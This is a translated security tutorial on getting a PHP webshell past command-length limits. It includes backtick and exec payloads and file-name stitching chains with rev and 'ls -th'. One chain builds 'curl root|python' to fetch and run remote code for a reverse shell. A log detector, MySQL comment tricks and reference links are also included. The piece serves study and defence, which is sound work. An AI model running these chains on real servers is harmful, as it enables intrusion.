How to get a webshell when the command length is limited (breaking through function parameter limits, and some slick MySQL tricks)

Source: Internet
Author: User

0x01 The question

Last time, in my post on the pitfalls of getting a webshell (how to write a PHP backdoor without digits or letters), we talked about some PHP tricks for cleverly bypassing a filter on digits and letters. Today I want to share how to get a webshell when the command length is limited, how to break through limits on function parameters, and some MySQL tricks.

0x02 Problem analysis

Let's look at an example:

<?php
$param = $_REQUEST['param'];
// Run the input only if it is at most 16 characters long (the limit discussed below)
if (strlen($param) < 17) {
    eval($param);
}
?>

The question here is how to execute arbitrary code despite the length limit. This is actually very simple: the limit can be bypassed directly by calling a backdoor function such as eval or assert.

The argument to eval is a string, for example:

eval('echo 1;');

The argument to assert is an expression (or a function call), so we can write:

assert(phpinfo());

From the PHP manual I learned that assert is a function, while eval is not a function but a language construct. In eval($a), $a can only be a string; in assert($a), $a can be either PHP code or a string of PHP code. If $a in assert($a) is a string, it cannot contain more than 2 semicolons; if it does, execution only reaches the first one. To execute multiple PHP statements with assert, wrap them in eval.

For example:

assert(eval("echo 1;echo 2;"));

The results are as follows:

Note that if the statement above is written as assert(eval("echo 1;echo 2")); then neither echo 1 nor echo 2 is executed, because the string passed to eval must consist of PHP statements terminated by semicolons.

For more details, refer to the PHP manual:

eval function: http://www.php.net/manual/zh/function.eval.php

assert function: http://php.net/manual/zh/function.assert.php

What if it's like the following example?

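<?php
$param = $_REQUEST['param'];
// Input must be at most 16 characters and must not contain eval or assert.
// The comparison is strict (=== false): stripos() returns 0 for a match at
// position 0, and 0 == false would let such input through.
if (strlen($param) < 17 && stripos($param, 'eval') === false && stripos($param, 'assert') === false) {
    eval($param);
}
?>

The stripos function finds the position at which the target string first appears in a string. Here the input is limited to 16 characters and may not use eval or assert, so how do we execute a command?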

We can bypass the restrictions by command execution:

param=`$_GET[1]`;&1=bash

Of course, we can also use the exec function:

param=exec($_GET[1]);

exec executes an external program; see the PHP manual for details: http://php.net/manual/zh/function.exec.php

What about this case?

<?php
$command = 'dir ' . $_POST['dir'];
// Escape shell metacharacters in the whole command string
$escaped_command = escapeshellcmd($command);
var_dump($escaped_command);
// Write the escaped command to a batch file and run it
file_put_contents('out.bat', $escaped_command);
system('out.bat');
?>

We tested it:

How can we get around this?

Let's look at these functions first. The escapeshellcmd() function escapes characters in a string that could be used to trick a shell command into executing arbitrary commands. It is meant to ensure that user-supplied data is escaped before it is passed to exec() or system(), or to the backtick operator.

See the PHP manual for detailed usage of the escapeshellcmd() function: http://php.net/manual/zh/function.escapeshellcmd.php

So which characters does this function escape?

Reading the source code, we find that these characters are escaped by prefixing them with ^. So there is no way to use & or | to run other commands; we can only list directories.

Interested readers can study the source code, which I have uploaded here: https://files.cnblogs.com/files/ECJTUACM-873284962/exec.rar

There is a trick for this: when a .bat file is executed, %1a can be used to bypass the filter and execute commands. We try the following:

Earlier we covered how to get a webshell with a 16-character limit. In binary exploitation, we sometimes meet cases where only 8 bytes of data are controllable and, excluding the terminator at the end of the string, we are limited to 7 characters. What do we do in that situation?

Let's look at the previous example and change the command length to 7.

<?php
$param = $_REQUEST['param'];
// Input is limited to 7 characters
if (strlen($param) < 8) {
    eval($param);
}
?>

This reminds me of the riddle in Zhao Benshan's sketch "Hourly": how many steps does it take to put an elephant into a refrigerator?

Before going further, we need to lay some groundwork.

We can assemble commands piece by piece.

Let's take a more demanding case: the command length is limited to 5. How do we complete the injection and successfully get a webshell?

<?php
$sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']);
@mkdir($sandbox);
@chdir($sandbox);
// Each request may run one shell command of at most 5 characters
if (isset($_GET['cmd']) && strlen($_GET['cmd']) <= 5) {
    @exec($_GET['cmd']);
} else if (isset($_GET['reset'])) {
    @exec('/bin/rm -rf ' . $sandbox);
}
highlight_file(__FILE__);

For example, suppose we want to execute the command echo hello. What should we do?

We can construct the following:

>echo
>hello

The results are as follows:

We can see that two files were created, echo and hello. Now we execute the command *.

We can see that the command echo hello is executed, so the string hello is printed directly.

We can use echo * to see what * expands to.

We use >echo and >hello to create the pieces of the command, and * then stitches them together and executes the command echo hello.

What if the conditions are a little harsher? With the command length limited to 4, how do we complete the injection and successfully get a webshell?

<?php
$sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']);
@mkdir($sandbox);
@chdir($sandbox);
// Each request may run one shell command of at most 4 characters
if (isset($_GET['cmd']) && strlen($_GET['cmd']) <= 4) {
    @exec($_GET['cmd']);
} else if (isset($_GET['reset'])) {
    @exec('/bin/rm -rf ' . $sandbox);
}
highlight_file(__FILE__);

For example, if we want to execute the command ls -l, we can imitate the approach above and construct the following:

>ls
>-l

The results are as follows:

We can see that two files were created, namely ls and -l, and then we execute the command *.

Eh, why does it report an error?

Earlier we generated echo and hello. The ASCII value of e is less than that of h, so when the names are sorted, echo automatically comes first and hello second. For ls, however, we can see that the files are listed with -l in front of ls. If we execute *, what actually runs is -l ls, which produces an error message.

So how do we get ls -l?

0x03 Solutions

01. Reversing the command content

The simplest way is to write the command in reverse order.

If we reverse the characters of the command, we get l- sl, whose pieces sort in exactly the order we need. After that we only need a command that can reverse the characters back, rev, and we are done.

So first we create two files, namely l- and sl.

>l-
>sl

The results are as follows:

Then we write the combination l- sl to the file v and view the contents of v.

We can see that the file v also contains a v, which interferes with our command. What if we only want l- and sl in the file?

Here is a little trick: the command dir a b>c writes a b to the file c without writing anything extra into it.

We create a file named dir and then execute *>v to get l- and sl.

>dir
echo *
*>v
cat v

The results are as follows:

Then we just need to reverse the character sequence of this command, and the rev command does exactly that: it reverses its input.

So we need to create a file called rev and then execute *v. Only the files rev and v match the wildcard *v, so the command that runs is rev v, which produces the output we want: ls -l.

>rev
ls
*v

The results are as follows:

We then redirect that output to the file x and execute sh x, successfully running the ls -l command, which has a length of 5, using commands of at most 4 characters.

*v>x
cat x
sh x

The results are as follows:

Written as a shell script, the commands above are:

#!/usr/bin/env bash
>l-
>sl
>dir
*>v
>rev
*v>x
sh x

We can see that every command in the chain has a length less than or equal to 4, so we can happily execute the ls -l command.

02. Sorting by time

The ls command has a -t option that sorts by time: files generated earlier come later in the listing and files generated later come first, similar to the structure of a stack.

Suppose we want to generate the command ls -t >g. Reversed, it is g> t- sl, and in ASCII order t- sorts after sl, which does not meet our needs. So we adapt and generate the command ls -th >g instead, whose reverse is g> ht- sl, which satisfies the ordering requirement.

>g\>
>ht-
>sl
>dir
*>v
>rev
*v>x
cat x

The results are as follows:

03. Stitching commands with line continuation

Linux has a magic symbol, \ (backslash), which continues a command onto the next line. In the example below I create two files, a and b, and then run ls both normally and split with a continuation; the effect is the same.

>a
>b
ls
l\
s

The results are as follows:

In this way, we can construct a series of file names that are joined into a command by line continuation. For example, I am going to construct the command curl root|python:

>on
>th\\
>py\\
>\|\\
>ot\\
>ro\\
>\ \\
>rl\\
>cu\\

The results are as follows:

There may be some doubt here: >th\\ looks like 5 characters, which exceeds the limit of 4. That is because an interactive shell needs \\ to be typed to produce a \, while in the PHP code's exec only a single \ is needed, as in exec(">th\"). So it is actually no more than 4 characters.

Next we execute ls -th>g, which writes these file names into the file g in time order, and then we look at the contents of g.

Then executing sh g is enough to get the reverse shell. I won't show that here; you can try it yourself on your own machine.

Here is a summary of how to get a webshell when the command length is limited:

    • w is the shortest command
    • ls -t lists all files in the current directory ordered by creation time
    • The file list separates each file name with a [line feed]
    • Introduce '\' to escape the line breaks in the ls output
    • The line breaks then do not affect command execution
    • Arbitrary command execution is constructed successfully, and the webshell is written
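
From the defender's side, the chain summarised above leaves a recognisable trace in the web server's access log: every request passes the per-request length check, but one client sends a run of tiny cmd values that create files and then execute them through a wildcard or sh. The following Python detector is an added example, not code from the original article; the log format, the sample lines, the MIN_HITS threshold and the function names classify and staging_clients are assumptions made for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines. 203.0.113.7 replays the <=4-character chain from
# the article's script; the other two clients send unrelated short values.
SAMPLE_LOG = "\n".join(
    f'{ip} - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?cmd={q} HTTP/1.1" 200 512'
    for ip, q in [
        ("203.0.113.7", "%3El-"), ("203.0.113.7", "%3Esl"), ("203.0.113.7", "%3Edir"),
        ("203.0.113.7", "*%3Ev"), ("203.0.113.7", "%3Erev"), ("203.0.113.7", "*v%3Ex"),
        ("203.0.113.7", "sh%20x"), ("198.51.100.20", "ls"), ("198.51.100.20", "id"),
        ("192.0.2.9", "%3Ea"),
    ]
)

LINE_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
MAX_LEN = 5    # longest cmd value the article's scripts accept
MIN_HITS = 4   # assumed alert threshold: staging requests per client

def classify(cmd):
    """Return the role a short cmd value plays in the chain, or None."""
    if not cmd or len(cmd) > MAX_LEN:
        return None
    if cmd.startswith(">") and len(cmd) > 1:
        return "create-file"   # '>name' only creates an empty file called name
    if "*" in cmd:
        return "glob-exec"     # the shell runs the sorted file names as a command
    if cmd.startswith("sh "):
        return "run-script"    # runs the file the chain assembled
    return None

def staging_clients(log_text, param="cmd"):
    """Return {client_ip: [(cmd, role), ...]} for clients that create and then execute files."""
    seen = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        for cmd in parse_qs(urlsplit(target).query, keep_blank_values=True).get(param, []):
            role = classify(cmd)
            if role:
                seen[ip].append((cmd, role))
    flagged = {}
    for ip, hits in seen.items():
        roles = {role for _, role in hits}
        if len(hits) >= MIN_HITS and "create-file" in roles and roles - {"create-file"}:
            flagged[ip] = hits
    return flagged
```

Because the length check is applied to each request separately while the sandbox directory keeps state between requests, the correlation has to be done per client, as staging_clients does.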

As for MySQL, there are several ways to write comments; here is a list:

    • [#] in-line comment
    • [--] in-line comment; note the space at the end
    • [/*...*/] block comment, which can span multiple lines
    • [`] can be used as a comment in some cases
    • [;] when multi-statement execution is available, a semicolon can directly close the first SQL statement

For details, refer to P牛's slides: "Those Clever Tricks from Xiaomiquan"

0x04 Extended reading
    • https://speakerd.s3.amazonaws.com/presentations/f81159300925466c88335f3cf740beb6/%E6%9D%A5%E8%87%AA%E5%B0%8F%E5%af%86%e5%9c%88%e9%87%8c%e7%9a%84%e9%82%a3%e4%ba%9b%e5%a5%87%e6%8a%80%e6%b7%ab%e5%b7%a7.pdf
    • https://www.leavesongs.com/PHP/bypass-eval-length-restrict.html
    • https://www.cnblogs.com/ECJTUACM-873284962/p/9433641.html
